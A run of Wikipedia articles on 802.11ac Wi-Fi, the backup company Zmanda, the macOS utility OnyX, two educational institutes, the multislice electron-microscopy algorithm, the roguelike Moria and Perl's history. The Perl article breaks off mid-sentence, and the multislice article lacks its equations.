11ac and 11a/n devices Adds four new fields to the PPDU header identifying the frame as a very high throughput (VHT) frame as opposed to 802.11n's high throughput (HT) or earlier. The first three fields in the header are readable by legacy devices to allow coexistence Features Mandatory Borrowed from the 802.11a/802.11g specifications: 800 ns regular guard interval Binary convolutional coding (BCC) Single spatial stream Newly introduced by the 802.11ac specification: 80 MHz channel bandwidths Optional Borrowed from the 802.11n specification: Two to four spatial streams Low-density parity-check code (LDPC) Space–time block coding (STBC) Transmit beamforming (TxBF) 400 ns short guard interval (SGI) Newly introduced by the 802.11ac specification: five to eight spatial streams 160 MHz channel bandwidths (contiguous 80+80) 80+80 MHz channel bonding (discontiguous 80+80) MCS 8/9 (256-QAM) New scenarios and configurations The single-link and multi-station enhancements supported by 802.11ac enable several new WLAN usage scenarios, such as simultaneous streaming of HD video to multiple clients throughout the home, rapid synchronization and backup of large data files, wireless display, large campus/auditorium deployments, and manufacturing floor automation. With the inclusion of USB 3.0 interface, 802.11ac access points and routers can use locally attached storage to provide various services that fully utilize their WLAN capacities, such as video streaming, FTP servers, and personal cloud services. With storage locally attached through USB 2.0, filling the bandwidth made available by 802.11ac was not easily accomplished. Example configurations All rates assume 256-QAM, rate 5/6: Wave 1 vs. Wave 2 Wave 2, referring to products introduced in 2016, offers a higher throughput than legacy Wave 1 products, those introduced starting in 2013. The maximum physical layer theoretical rate for Wave 1 is 1.3 Gbit/s, while Wave 2 can reach 2.34 Gbit/s. Wave 2 can therefore achieve 1 Gbit/s even if the real world throughput turns out to be only 50% of the theoretical rate. Wave 2 also supports a higher number of connected devices. Data rates and speed Several companies are currently offering 802.11ac chipsets with higher modulation rates: MCS-10 and MCS-11 (1024-QAM), supported by Quantenna and Broadcom. Although technically not part of 802.11ac, these new MCS indices are expected to become official in the 802.11ax standard (~2019), the successor to 802.11ac. 160 MHz channels, and thus the throughput might be unusable in some countries/regions due to regulatory issues that allocated some frequencies for other purposes. Advertised speeds 802.11ac-class device wireless speeds are often advertised as AC followed by a number, that number being the highest link rates in Mbit/s of all the simultaneously-usable radios in the device added up. For example, an AC1900 access point might have 600 Mbit/s capability on its 2.4 GHz radio and 1300 Mbit/s capability on its 5 GHz radio. No single client device could connect and achieve 1900 Mbit/s of throughput, but separate devices each connecting to the 2.4 GHz and 5 GHz radios could achieve combined throughput approaching 1900 Mbit/s. Different possible stream configurations can add up to the same AC number. Products Commercial routers and access points Quantenna released the first 802.11ac chipset for retail Wi-Fi routers and consumer electronics on November 15, 2011. Redpine Signals released the first low power 802.11ac technology for smartphone application processors on December 14, 2011. On January 5, 2012, Broadcom announced its first 802.11ac Wi-Fi chips and partners and on April 27, 2012, Netgear announced the first Broadcom-enabled router. On May 14, 2012, Buffalo Technology released the world’s first 802.11ac products to market, releasing a wireless router and client bridge adapter. On December 6, 2012, Huawei announced commercial availability of the industry's first enterprise-level 802.11ac Access Point. Motorola Solutions is selling 802.11ac access points including the AP 8232. In April 2014, Hewlett-Packard started selling the HP 560 access point in the controller-based WLAN enterprise market segment. Commercial laptops On June 7, 2012, it was reported that Asus had unveiled its ROG G75VX gaming notebook, which would be the first consumer-oriented notebook to be fully compliant with 802.11ac (albeit in its "draft 2.0" version). Apple began implementing 802.11ac starting with the MacBook Air in June 2013, followed by the MacBook Pro and Mac Pro later that year. Hewlett-Packard incorporates 802.11ac compliance in laptop computers. Commercial handsets (partial list) Commercial tablets Chipsets See also IEEE 802.11ad Notes References External links 802.11ac Technology Introduction white paper MIMO 802.11ac Test Architectures 802.11ac: The Fifth Generation of Wi-Fi Technical Paper 802.11ac primer Intel Wireless Products Selection Guide ac-2013
25304329
https://en.wikipedia.org/wiki/Zmanda
Zmanda
Zmanda Inc. is an open-source software and Cloud backup software company. It is headquartered in the United States. In partnership with open source companies such as Sun and MySQL, the company contributed to open source projects. Zmanda was acquired by Betsol in May, 2018. History Zmanda was founded in May, 2005, in Sunnyvale, California. It disclosed a round of $2 million of funding in October, 2005, with an investor Chandor Kant who was also an executive at the time. Pete Childers became chief executive in May, 2007, and then resigned in July of that year, with Kant then becoming chief executive. Zmanda develops and maintains the open source backup tools Advanced Maryland Automatic Network Disk Archiver (Amanda), and the Zmanda Recovery Manager (ZRM) for MySQL, an open source relational database management system. ZRM included a graphical user interface for installation and management. ZRM is written in the Perl programming language, and released with a GNU General Public License. Source code is kept on GitHub. The company was named one of MySQL partners of the year in 2008. Within two weeks of the announced that Sun Microsystems would acquire MySQL AB (the company that developed MySQL), Sun announced a partnership to sell ZRM. A backup agent allowed integration with the NetBackup product from Symantec. Version 3.0 of ZRM was released in 2009, including support for the Ubuntu distribution of the Linux operating system. In early 2009, the company announced a remote backup service for cloud computing. Zmanda developed the open source ZCloud API, announced in 2009, to enable backup software vendors to integrate software with public and private storage clouds. Like many open source firms, Zmanda generated revenue by selling products built on the open source codebase as well as by providing services and support to those customers who buy these products. Zmanda offers an annual subscription fee model similar to those by Red Hat and MySQL. In 2010, Zmanda announced an option to support IBM Tivoli Storage Manager in ZRM. After Sun was acquired by Oracle Corporation in 2010, it continued to promote ZRM. Zmanda was acquired by Carbonite, Inc. in 2012, and then Betsol in May, 2018. Betsol, headed by Ashok Reddy, had also acquired the backup software called Rebit from Carbonite in 2017. When the 4.0 version was announced in 2020, the location given was Broomfield, Colorado, where Betsol is located, Betsol calls the software Zmanda, releasing version 4.1 in September, 2021 which included support for Microsoft Azure cloud. See also List of online backup services References External links Official site Free data recovery software Free backup software Companies based in Sunnyvale, California
7734968
https://en.wikipedia.org/wiki/List%20of%20trademarked%20open-source%20software
List of trademarked open-source software
This is a list of free/open-source software whose names are covered by registered trademarks. As many countries provide some form of basic protection for unregistered (common law) trademarks, nearly any free or open-source software title may be trademarked under common law. This list covers software whose trademarks are registered under a country's intellectual property body. References Free software lists and comparisons Open source software Open source software
15336081
https://en.wikipedia.org/wiki/OnyX
OnyX
OnyX is a popular freeware utility for macOS developed by French developer Joël Barrière that is compatible with both Intel processors and Apple silicon (previous versions supported PowerPC). As a multifunctional tool for maintenance and optimization, it can control many basic Unix programs already built into macOS, including setting hidden preferences otherwise modified by using property list editors and the command line. Features Verify the structure of the file system on the start-up volume Repair disk permissions Configure certain parameters hidden from the system and from certain applications Empty System, User, Internet, Font caches Force Empty the Trash Rebuild Launch Services, CoreDuet database, XPC Cache... Rebuild Spotlight and Mail indexes Development Created in 2003 by Joël Barrière, a.k.a. Titanium, the program was originally meant to address its creator's personal needs. Developed using Xcode, Apple's software development environment (Cocoa + AppleScript Studio + Objective-C), OnyX is regularly updated by its author taking into consideration users' suggestions and requests. To do its job, the program uses macOS's standard Unix utilities, allowing their control through a graphical user interface without needing the command line. Versions OnyX versions are specific to each version of macOS and are not backward compatible. The program will not work correctly if used with an OS for which it was not designed. Mac OS X 10.2 Jaguar: OnyX version 1.3.1 Mac OS X 10.3 Panther: OnyX version 1.5.3 Mac OS X 10.4 Tiger: OnyX version 1.8.6 Mac OS X 10.5 Leopard: OnyX version 2.0.6 Mac OS X 10.6 Snow Leopard: OnyX version 2.4.0 Mac OS X 10.7 Lion: OnyX version 2.4.8 OS X 10.8 Mountain Lion: OnyX version 2.7.4 OS X 10.9 Mavericks: OnyX version 2.8.9 OS X 10.10 Yosemite: OnyX version 3.0.2 OS X 10.11 El Capitan: OnyX version 3.1.9 macOS 10.12 Sierra: OnyX version 3.3.1 macOS 10.13 High Sierra: OnyX version 3.4.9 macOS 10.14 Mojave: OnyX version 3.6.8 macOS 10.15 Catalina: OnyX version 3.8.3 macOS 11 Big Sur: OnyX version 3.9.5 macOS 12 Monterey: OnyX version 4.1.0 The build for macOS Monterey is actively maintained. However, all previous versions in support of past operating systems are still available for download from the developer's website. References External links Official Site in English Official Site in French Utilities for macOS
30864570
https://en.wikipedia.org/wiki/Institute%20of%20Management%20Sciences%20%28Lahore%29
Institute of Management Sciences (Lahore)
The Institute of Management Sciences (IMS Lahore), formerly known as Pak-American Institute of Management Sciences (Pak-AIMS), is a project of AKEF (Al Karim Educational Foundation) established in Lahore, Pakistan in 1987 which offers undergraduate and graduate programs in management and computer sciences. The Rector of the institute is Khalid Ranjha in 2014. It is located in Gulberg, Lahore. Pak-AIMS was issued 'No Objections Certificate (NOC)' by the University Grants Commission, now known as the Higher Education Commission (Pakistan) for the award of charter in 1995. Consequently, the institute was chartered as Institute of Management Sciences (IMS) by the Government of Punjab (Pakistan) under the Punjab Ordinance XXIII of 2002 and given degree-awarding status. Government-recognized institution Institute of Management Sciences has 1,400 students at two campuses and 110 faculty members, who teach 170 courses in tri-mesters. This institute is officially accredited and recognized by the Higher Education Commission of Pakistan. Introduction and history The institute was established in Lahore in 1986 as the Canadian School of Management - Lahore Learning Center. Later the name was changed to The Pak-American Institute of Management Sciences (Pak-AIMS) to reflect the institute's Articulation Agreement with the College of Staten Island of City University of New York (CSI/CUNY), USA. Campuses Main campus, Gulberg III, Lahore, Pakistan. Departments Department of Computer Science Department of Management Sciences Department of Law Department of Physics Department of English literature Department of Mathematics Bachelor's degrees offered bachelor's in Computer Sciences Bachelor of Business Administration Bachelor of Information Technology bachelor's in Computer Engineering bachelor's in Software Engineering Master's degrees offered Master of Business Administration master's in Computer Sciences Master of Business Administration (Executive) master's in History Notable faculty Khalid Ranjha References External links Pak-AIMS website Location on map Higher Education Commission of Pakistan recognized universities list in Pakistan Educational institutions established in 1987 Universities and colleges in Lahore Business schools in Pakistan 1987 establishments in Pakistan
22157068
https://en.wikipedia.org/wiki/Multislice
Multislice
The multislice algorithm is a method for the simulation of the elastic interaction of an electron beam with matter, including all multiple scattering effects. The method is reviewed in the book by Cowley. The algorithm is used in the simulation of high resolution Transmission electron microscopy micrographs, and serves as a useful tool for analyzing experimental images. Here we describe relevant background information, the theoretical basis of the technique, approximations used, and several software packages that implement this technique. Moreover, we delineate some of the advantages and limitations of the technique and important considerations that need to be taken into account for real-world use. Background The multislice method has found wide application in electron crystallography. The mapping from a crystal structure to its image or diffraction pattern has been relatively well understood and documented. However, the reverse mapping from electron micrograph images to the crystal structure is generally more complicated. The fact that the images are two-dimensional projections of three-dimensional crystal structure makes it tedious to compare these projections to all plausible crystal structures. Hence, the use of numerical techniques in simulating results for different crystal structure is integral to the field of electron microscopy and crystallography. Several software packages exist to simulate electron micrographs. There are two widely used simulation techniques that exist in literature: the Bloch wave method, derived from Hans Bethe's original theoretical treatment of the Davisson-Germer experiment, and the multislice method. In this paper, we will primarily focus on the multislice method for simulation of diffraction patterns, including multiple elastic scattering effects. Most of the packages that exist implement the multislice algorithm along with Fourier analysis to incorporate electron lens aberration effects to determine electron microscope image and address aspects such as phase contrast and diffraction contrast. For electron microscope samples in the form of a thin crystalline slab in the transmission geometry, the aim of these software packages is to provide a map of the crystal potential, however this inversion process is greatly complicated by the presence of multiple elastic scattering. The first description of what is now known as the multislice theory was given in the classic paper by Cowley and Moodie. In this work, the authors describe scattering of electrons using a physical optics approach without invoking quantum mechanical arguments. Many other derivations of these iterative equations have since been given using alternative methods, such as Greens functions, differential equations, scattering matrices or path integral methods. A summary of the development of a computer algorithm from the multislice theory of Cowley and Moodie for numerical computation was reported by Goodman and Moodie. They also discussed in detail the relationship of the multislice to the other formulations. Specifically, using Zassenhaus's theorem, this paper gives the mathematical path from multislice to 1. Schroedingers equation (derived from the multislice), 2. Darwin's differential equations, widely used for diffraction contrast TEM image simulations - the Howie-Whelan equations derived from the multislice. 3. Sturkey's scattering matrix method. 4. the free-space propagation case, 5. The phase grating approximation, 6. A new "thick-phase grating" approximation, which has never been used, 7. Moodie's polynomial expression for multiple scattering, 8. The Feynman path-integral formulation, and 9. relationship of multislice to the Born series. The relationship between algorithms is summarized in Section 5.11 of Spence (2013), (see Figure 5.9). Theory The form of multislice algorithm presented here has been adapted from Peng, Dudarev and Whelan 2003. The multislice algorithm is an approach to solving the Schrödinger wave equation: In 1957, Cowley and Moodie showed that the Schrödinger equation can be solved analytically to evaluate the amplitudes of diffracted beams. Subsequently, the effects of dynamical diffraction can be calculated and the resulting simulated image will exhibit good similarities with the actual image taken from a microscope under dynamical conditions. Furthermore, the multislice algorithm does not make any assumption about the periodicity of the structure and can thus be used to simulate HREM images of aperiodic systems as well. The following section will include a mathematical formulation of the Multislice algorithm. The Schrödinger equation can also be represented in the form of incident and scattered wave as: where is the Green's function that represents the amplitude of the electron wave function at a point due to a source at point . Hence for an incident plane wave of the form the Schrödinger equation can be written as We then choose the coordinate axis in such a way that the incident beam hits the sample at (0,0,0) in the -direction, i.e., . Now we consider a wave-function with a modulation function for the amplitude. Equation () becomes then an equation for the modulation function, i.e., . Now we make substitutions with regards to the coordinate system we have adhered, i.e., and thus , where is the wavelength of the electrons with energy and is the interaction constant. So far we have set up the mathematical formulation of wave mechanics without addressing the scattering in the material. Further we need to address the transverse spread, which is done in terms of the Fresnel propagation function . The thickness of each slice over which the iteration is performed is usually small and as a result within a slice the potential field can be approximated to be constant . Subsequently, the modulation function can be represented as: We can therefore represent the modulation function in the next slice where, * represents convolution, and defines the transmission function of the slice. Hence, the iterative application of the aforementioned procedure will provide a full interpretation of the sample in context. Further, it should be reiterated that no assumptions have been made on the periodicity of the sample apart from assuming that the potential is uniform within the slice. As a result, it is evident that this method in principle will work for any system. However, for aperiodic systems in which the potential will vary rapidly along the beam direction, the slice thickness has to be significantly small and hence will result in higher computational expense. Practical Considerations The basic premise is to calculate diffraction from each layer of atoms using Fast Fourier Transforms (FFT) and multiplying each by a phase grating term. The wave is then multiplied by a propagator, inverse Fourier Transformed, multiplied by a phase grating term yet again, and the process is repeated. The use of FFTs allows a significant computational advantage over the Bloch Wave method in particular, since the FFT algorithm involves steps compared to the diagonalization problem of the Bloch wave solution which scales as where is the number of atoms in the system. (See Table 1 for comparison of computational time). The most important step in performing a multislice calculation is setting up the unit cell and determining an appropriate slice thickness. In general, the unit cell used for simulating images will be different from the unit cell that defines the crystal structure of a particular material. The primary reason for this due to aliasing effects which occur due wraparound errors in FFT calculations. The requirement to add additional “padding” to the unit cell has earned the nomenclature “super cell” and the requirement to add these additional pixels to the basic unit cell comes at a computational price. To illustrate the effect of choosing a slice thickness that is too thin, consider a simple example. The Fresnel propagator describes the propagation of electron waves in the z direction (the direction of the incident beam) in a solid: Where is the reciprocal lattice coordinate, z is the depth in the sample, and lambda is the wavelength of the electron wave (related to the wave vector by the relation ). Figure [fig:SliceThickness] shows vector diagram of the wave-fronts being diffracted by the atomic planes in the sample. In the case of the small-angle approximation ( 100 mRad) we can approximate the phase shift as . For 100 mRad the error is on the order of 0.5% since . For small angles this approximation holds regardless of how many slices there are, although choosing a greater than the lattice parameter (or half the lattice parameter in the case of perovskites) for a multislice simulation would result in missing atoms that should be in the crystal potential. Additional practical concerns are how to effectively include effects such as inelastic and diffuse scattering, quantized excitations (e.g. plasmons, phonons, excitons), etc. There was one code that took these things into consideration through a coherence function approach called Yet Another Multislice (YAMS), but the code is no longer available either for download or purchase. Available Software There are several software packages available to perform multislice simulations of images. Among these is NCEMSS, NUMIS, MacTempas, and Kirkland . Other programs exist but unfortunately many have not been maintained (e.g. SHRLI81 by Mike O’Keefe of Lawrence Berkeley National Lab and Cerius2 of Accerlys). A brief chronology of multislice codes is given in Table 2, although this is by no means exhaustive. ACEM/JCSTEM This software is developed by Professor Earl Kirkland of Cornell University. This code is freely available as an interactive Java applet and as standalone code written in C/C++. The Java applet is ideal for a quick introduction and simulations under a basic incoherent linear imaging approximation. The ACEM code accompanies an excellent text of the same name by Kirkland which describes the background theory and computational techniques for simulating electron micrographs (including multislice) in detail. The main C/C++ routines use a command line interface (CLI) for automated batching of many simulation. The ACEM package also includes a graphical user interface that is more appropriate for beginners. The atomic scattering factors in ACEM are accurately characterized by a 12-parameter fit of Gaussians and Lorentzians to relativistic Hartree–Fock calculations. NCEMSS This package was released from the National Center for High Resolution Electron Microscopy. This program uses a mouse-drive graphical user interface and is written by Dr. Roar Kilaas and Dr. Mike O’Keefe of Lawrence Berkeley National Laboratory. While the code is no longer developed, the program is available through the Electron Direct Methods (EDM) package written by Professor Laurence Marks of Northwestern University. Debye-Waller factors can be included in as a parameter to account for diffuse scattering, although the accuracy is unclear (i.e. a good guess of the Debye-Waller factor is needed). NUMIS The Northwestern University Multislice and Imaging System (NUMIS) is a package is written by Professor Laurence Marks of Northwestern University. It uses a command line interface (CLI) and is based on UNIX. A structure file must be provided as input in order to run use this code, which makes it ideal for advanced users. The NUMIS multislice programs use the conventional multislice algorithm by calculating the wavefunction of electrons at the bottom of a crystal and simulating the image taking into account various instrument-specific parameters including and convergence. This program is good to use if one already has structure files for a material that have been used in other calculations (for example, Density Functional Theory). These structure files can be used to general X-Ray structure factors which are then used as input for the PTBV routine in NUMIS. Microscope parameters can be changed through the MICROVB routine. MacTempas This software is specifically developed to run in Mac OS X by Dr. Roar Kilaas of Lawrence Berkeley National Laboratory. It is designed to have a user-friendly user interface and has been well-maintained relative to many other codes (last update May 2013). It is available (for a fee) from here. JMULTIS This is a software for multislice simulation was written in FORTRAN 77 by Dr. J. M. Zuo, while he was a postdoc research fellow at Arizona State University under the guidance of Prof. John C. H. Spence. The source code was published in the book of Electron Microdiffraction. A comparison between multislice and Bloch wave simulations for ZnTe was also published in the book. A separate comparison between several multislice algorithms at the year of 2000 was reported. QSTEM The Quantitative TEM/STEM (QSTEM) simulations software package was written by Professor Christopher Koch of Humboldt University of Berlin in Germany. Allows simulation of HAADF, ADF, ABF-STEM, as well as conventional TEM and CBED. The executable and source code are available as a free download on the Koch group website. STEM-CELL This is a code written by Dr Vincenzo Grillo of the Institute for Nanoscience (CNR) in Italy. This code is essentially a graphical frontend to the multislice code written by Kirkland, with more additional features. These include tools to generate complex crystalline structures, simulate HAADF images and model the STEM probe, as well as modeling of strain in materials. Tools for image analysis (e.g. GPA) and filtering are also available. The code is updated quite often with new features and a user mailing list is maintained. Freely available on their website. DR. PROBE Multi-slice image simulations for high-resolution scanning and coherent imaging transmission electron microscopy written by Dr. Juri Barthel from the Ernst Ruska-Centre at the Jülich Research Centre. The software comprises a graphical user interface version for direct visualization of STEM image calculations, as well as a bundle of command-line modules for more comprehensive calculation tasks. The programs have been written using Visual C++, Fortran 90, and Perl. Executable binaries for Microsoft Windows 32-bit and 64-bit operating systems are available for free from the website. clTEM OpenCL accelerated multislice software written by Dr. Adam Dyson and Dr. Jonathan Peters from University of Warwick. clTEM is under development as of October 2019. cudaEM cudaEM is a multi-GPU enabled code based on CUDA for multislice simulations developed by the group of Prof. Stephen Pennycook. References Microscopy Mathematical modeling
54637182
https://en.wikipedia.org/wiki/Vignan%27s%20Institute%20of%20Information%20Technology
Vignan's Institute of Information Technology
Vignan's Institute Of Information Technology is one of the engineering institutions run by the Vignan group of Guntur. It was established in 2002 to offer undergraduate (BTech) (college code:L3) courses in engineering and technology. It is situated in Duvvada, a suburban region of Visakhapatnam, India. Library facility This college has a good library named vignan dhara it has all volumes related to all study departments References Vignan's Institute Of Information Technology VIIT declared autonomous, to offer new job-oriented courses https://www.thehansindia.com/posts/index/Andhra-Pradesh/2018-09-20/Vignans-Institute-of-Information-Technology-holds-awareness-programme-on-employability/413032 Vignan's Institute of Information Technology holds awareness programme on employability "Yuvtarang 2k17 to be held at Duvvada on January 7, 8" Engineering colleges in Andhra Pradesh Universities and colleges in Visakhapatnam 2002 establishments in Andhra Pradesh Educational institutions established in 2002
161673
https://en.wikipedia.org/wiki/Moria%20%281983%20video%20game%29
Moria (1983 video game)
The Dungeons of Moria, usually referred to as just Moria, is a computer game inspired by J. R. R. Tolkien's novel The Lord of the Rings. The objective of the game is to dive deep into the Mines of Moria and kill the Balrog. Moria, along with Hack (1984) and Larn (1986), is considered to be the first roguelike game, and the first to include a town level. Moria was the basis of the better known Angband roguelike game, and influenced the preliminary design of Blizzard Entertainment's Diablo. Gameplay The player's goal is to descend to the depths of Moria to defeat the Balrog, akin to a boss battle. As with Rogue, levels are not persistent: when the player leaves the level and then tries to return, a new level is procedurally generated. Among other improvements to Rogue, there is a persistent town at the highest level where players can buy and sell equipment. Moria begins with creation of a character. The player first chooses a "race" from the following: Human, Half-Elf, Elf, Halfling, Gnome, Dwarf, Half-Orc, or Half-Troll. Racial selection determines base statistics and class availability. One then selects the character's "class" from the following: Warrior, Mage, Priest, Rogue, Ranger, or Paladin. Class further determines statistics, as well as the abilities acquired during gameplay. Mages, Rangers, and Rogues can learn magic; Priests and Paladins can learn prayers. Warriors possess no additional abilities. The player begins the game with a limited number of items on a town level consisting of six shops: (1) a General Store, (2) an Armory, (3) a Weaponsmith, (4) a Temple, (5) an Alchemy shop, and (6) a Magic-Users store. A staircase on this level descends into a series of randomly generated underground mazes. Deeper levels contain more powerful monsters and better treasures. Each time the player ascends or descends a staircase, a new level is created and the old one discarded; only the town persists throughout the game. As in most roguelikes, it is impossible to reload from a save if your character dies, as the game saves the state only upon exit, preventing save-scumming that is a key strategy in most computer games that allow saving. The balrog (represented by the upper-case letter B) is encountered at the deepest depths of the dungeon. Once the balrog has been killed, the game has been won, and no further saving of the game is possible. Player characteristics The player has many characteristics in the game. Some characteristics, like sex, weight, and height, cannot be changed once the player has been created, while other characteristics like strength, intelligence, and armor class can be modified by using certain items in a particular way. Mana and hit points are replenished by rest or by some other magical means. Gold accrues as the player steps on gems or currency. Experience accrues as the player performs various actions in the dungeon, mostly by killing creatures. The "miscellaneous abilities" are modified as each skill is performed and as the player increases in experience. History Around 1981, while enrolled at the University of Oklahoma, Robert Alan Koeneke became hooked on playing the video game, Rogue. Soon after, Koeneke moved departments to work on an early VAX-11/780 minicomputer running VMS, which at that time had no games. Since no longer having access to Rogue was "intolerable" for Koeneke, he started developing his own Rogue game using VMS BASIC and gave it the name, Moria Beta 1.0. During the summer of 1983, Koeneke rewrote his game in VMS Pascal, releasing Moria 1.0. In 1983/84 Jimmey Wayne Todd Jr. joined Koeneke on the development of Moria, bringing with him his character generator, and working on various aspects of the game, including the death routines. Koeneke started distributing the source code in 1985 under a license that permitted sharing and modification, but not commercial use. The last VMS version was Moria 4.8, released in November 1986. In February 1987, James E. Wilson started converting the VMS Pascal source code to the C programming language for use on UNIX systems, which had started to become popular by this date. To distinguish his release from the original VMS Moria, Wilson named it UNIX Moria, shortened to UMoria. UMoria 4.85 was released on November 5, 1987. As C was a much more portable programming language than VMS Pascal, there was an explosion of Moria ports for a variety of different computer systems such as MS-DOS, Amiga, Atari ST and Apple IIGS. UMoria 5.0, released in 1989, unified these separate ports into a single code base, fixing many bugs and gameplay balance issues, as well as adding lots of new features; many of which were taken from BRUCE Moria (1988). In 1990 the Angband project was started, which is based on the UMoria 5.2.1 source code. UMoria was in continuous development for several more years, with UMoria 5.5.2 released on July 21, 1994. During the early 2000's David Grabiner maintained the code base, releasing only minor compiler related fixes. In 2008, through the work of the free-moria project, UMoria was relicensed under the GNU General Public License. Jimmey Wayne Todd Jr., a major contributor to VMS Moria, along with Gary D. McAdoo, are not listed as consenting to the relicense. See also List of roguelikes List of open-source video games References External links Umoria.org v5.7 Windows / macOS executables, much historical information, and links to source code. Free Software Magazine - Freeing an old game discusses efforts to relicense UMoria MS-DOS Beej's Moria Page Online VMS/VAX Moria telnet portal RogueBasin Wiki listing of all the different Moria ports and variants. 1983 video games Acorn Archimedes games Amiga games DOS games Linux games Classic Mac OS games Video games based on Middle-earth Roguelike video games Windows games Curses (programming library) Cross-platform software Open-source video games Unix games Video games developed in the United States Video games using procedural generation
23939
https://en.wikipedia.org/wiki/Perl
Perl
Perl is a family of two high-level, general-purpose, interpreted, dynamic programming languages. "Perl" refers to Perl 5, but from 2000 to 2019 it also referred to its redesigned "sister language", Perl 6, before the latter's name was officially changed to Raku in October 2019. Though Perl is not officially an acronym, there are various backronyms in use, including "Practical Extraction and Reporting Language". Perl was developed by Larry Wall in 1987 as a general-purpose Unix scripting language to make report processing easier. Since then, it has undergone many changes and revisions. Raku, which began as a redesign of Perl 5 in 2000, eventually evolved into a separate language. Both languages continue to be developed independently by different development teams and liberally borrow ideas from each other. The Perl languages borrow features from other programming languages including C, sh, AWK, and sed; They provide text processing facilities without the arbitrary data-length limits of many contemporary Unix command line tools. Perl 5 gained widespread popularity in the late 1990s as a CGI scripting language, in part due to its powerful regular expression and string parsing abilities. In addition to CGI, Perl 5 is used for system administration, network programming, finance, bioinformatics, and other applications, such as for GUIs. It has been nicknamed "the Swiss Army chainsaw of scripting languages" because of its flexibility and power, and also its ugliness. In 1998, it was also referred to as the "duct tape that holds the Internet together," in reference to both its ubiquitous use as a glue language and its perceived inelegance. Perl is a highly expressive programming language: source code for a given algorithm can be short and highly compressible. Name Perl was originally named "Pearl". Wall wanted to give the language a short name with positive connotations. Wall discovered the existing PEARL programming language before Perl's official release and changed the spelling of the name. When referring to the language, the name is capitalized: Perl. When referring to the program itself, the name is uncapitalized (perl) because most Unix-like file systems are case-sensitive. Before the release of the first edition of Programming Perl, it was common to refer to the language as perl. Randal L. Schwartz, however, capitalized the language's name in the book to make it stand out better when typeset. This case distinction was subsequently documented as canonical. The name is occasionally expanded as a backronym: Practical Extraction and Report Language and Wall's own Pathologically Eclectic Rubbish Lister which is in the manual page for perl. History Early versions Larry Wall began work on Perl in 1987, while working as a programmer at Unisys, and version 1.0 was released to the comp.sources.unix newsgroup on February 1, 1988. The language expanded rapidly over the next few years. Perl 2, released in 1988, featured a better regular expression engine. Perl 3, released in 1989, added support for binary data streams. Originally, the only documentation for Perl was a single lengthy man page. In 1991, Programming Perl, known to many Perl programmers as the "Camel Book" because of its cover, was published and became the de facto reference for the language. At the same time, the Perl version number was bumped to 4, not to mark a major change in the language but to identify the version that was well documented by the book. Early Perl 5 Perl 4 went through a series of maintenance releases, culminating in Perl 4.036 in 1993, whereupon Wall abandoned Perl 4 to begin work on Perl 5. Initial design of Perl 5 continued into 1994. The perl5-porters mailing list was established in May 1994 to coordinate work on porting Perl 5 to different platforms. It remains the primary forum for development, maintenance, and porting of Perl 5. Perl 5.000 was released on October 17, 1994. It was a nearly complete rewrite of the interpreter, and it added many new features to the language, including objects, references, lexical (my) variables, and modules. Importantly, modules provided a mechanism for extending the language without modifying the interpreter. This allowed the core interpreter to stabilize, even as it enabled ordinary Perl programmers to add new language features. Perl 5 has been in active development since then. Perl 5.001 was released on March 13, 1995. Perl 5.002 was released on February 29, 1996 with the new prototypes feature. This allowed module authors to make subroutines that behaved like Perl builtins. Perl 5.003 was released June 25, 1996, as a security release. One of the most important events in Perl 5 history took place outside of the language proper and was a consequence of its module support. On October 26, 1995, the Comprehensive Perl Archive Network (CPAN) was established as a repository for the Perl language and Perl modules; as of May 2017, it carries over 185,178 modules in 35,190 distributions, written by more than 13,071 authors, and is mirrored worldwide at more than 245 locations. Perl 5.004 was released on May 15, 1997, and included, among other things, the UNIVERSAL package, giving Perl a base object from which all classes were automatically derived and the ability to require versions of modules. Another significant development was the inclusion of the CGI.pm module, which contributed to Perl's popularity as a CGI scripting language. Perl 5.004 added support for Microsoft Windows, Plan 9, QNX, and AmigaOS. Perl 5.005 was released on July 22, 1998. This release included several enhancements to the regex engine, new hooks into the backend through the B::* modules, the qr// regex quote operator, a large selection of other new core modules, and added support for several more operating systems, including BeOS. 2000–2020 Perl 5.6 was released on March 22, 2000. Major changes included 64-bit support, Unicode string representation, support for files over 2 GiB, and the "our" keyword. When developing Perl 5.6, the decision was made to switch the versioning scheme to one more similar to other open source projects; after 5.005_63, the next version became 5.5.640, with plans for development versions to have odd numbers and stable versions to have even numbers. In 2000, Wall put forth a call for suggestions for a new version of Perl from the community. The process resulted in 361 RFC (request for comments) documents that were to be used in guiding development of Perl 6. In 2001, work began on the "Apocalypses" for Perl 6, a series of documents meant to summarize the change requests and present the design of the next generation of Perl. They were presented as a digest of the RFCs, rather than a formal document. At this point, Perl 6 existed only as a description of a language. Perl 5.8 was first released on July 18, 2002, and had nearly yearly updates since then. Perl 5.8 improved Unicode support, added a new I/O implementation, added a new thread implementation, improved numeric accuracy, and added several new modules. As of 2013 this version still remains the most popular version of Perl and is used by Red Hat 5, Suse 10, Solaris 10, HP-UX 11.31 and AIX 5. In 2004, work began on the "Synopses"documents that originally summarized the Apocalypses, but which became the specification for the Perl 6 language. In February 2005, Audrey Tang began work on Pugs, a Perl 6 interpreter written in Haskell. This was the first concerted effort toward making Perl 6 a reality. This effort stalled in 2006. PONIE is an acronym for Perl On New Internal Engine. The PONIE Project existed from 2003 until 2006 and was to be a bridge between Perl 5 and Perl 6. It was an effort to rewrite the Perl 5 interpreter to run on Parrot, the Perl 6 virtual machine. The goal was to ensure the future of the millions of lines of Perl 5 code at thousands of companies around the world. The PONIE project ended in 2006 and is no longer being actively developed. Some of the improvements made to the Perl 5 interpreter as part of PONIE were folded into that project. On December 18, 2007, the 20th anniversary of Perl 1.0, Perl 5.10.0 was released. Perl 5.10.0 included notable new features, which brought it closer to Perl 6. These included a switch statement (called "given"/"when"), regular expressions updates, and the 'smart match operator (~~). Around this same time, development began in earnest on another implementation of Perl 6 known as Rakudo Perl, developed in tandem with the Parrot virtual machine. As of November 2009, Rakudo Perl has had regular monthly releases and now is the most complete implementation of Perl 6. A major change in the development process of Perl 5 occurred with Perl 5.11; the development community has switched to a monthly release cycle of development releases, with a yearly schedule of stable releases. By that plan, bugfix point releases will follow the stable releases every three months. On April 12, 2010, Perl 5.12.0 was released. Notable core enhancements include new package NAME VERSION syntax, the Yada Yada operator (intended to mark placeholder code that is not yet implemented), implicit strictures, full Y2038 compliance, regex conversion overloading, DTrace support, and Unicode 5.2. On January 21, 2011, Perl 5.12.3 was released; it contains updated modules and some documentation changes. Version 5.12.4 was released on June 20, 2011. The latest version of that branch, 5.12.5, was released on November 10, 2012. On May 14, 2011, Perl 5.14 was released with JSON support built-in. On May 20, 2012, Perl 5.16 was released. Notable new features include the ability to specify a given version 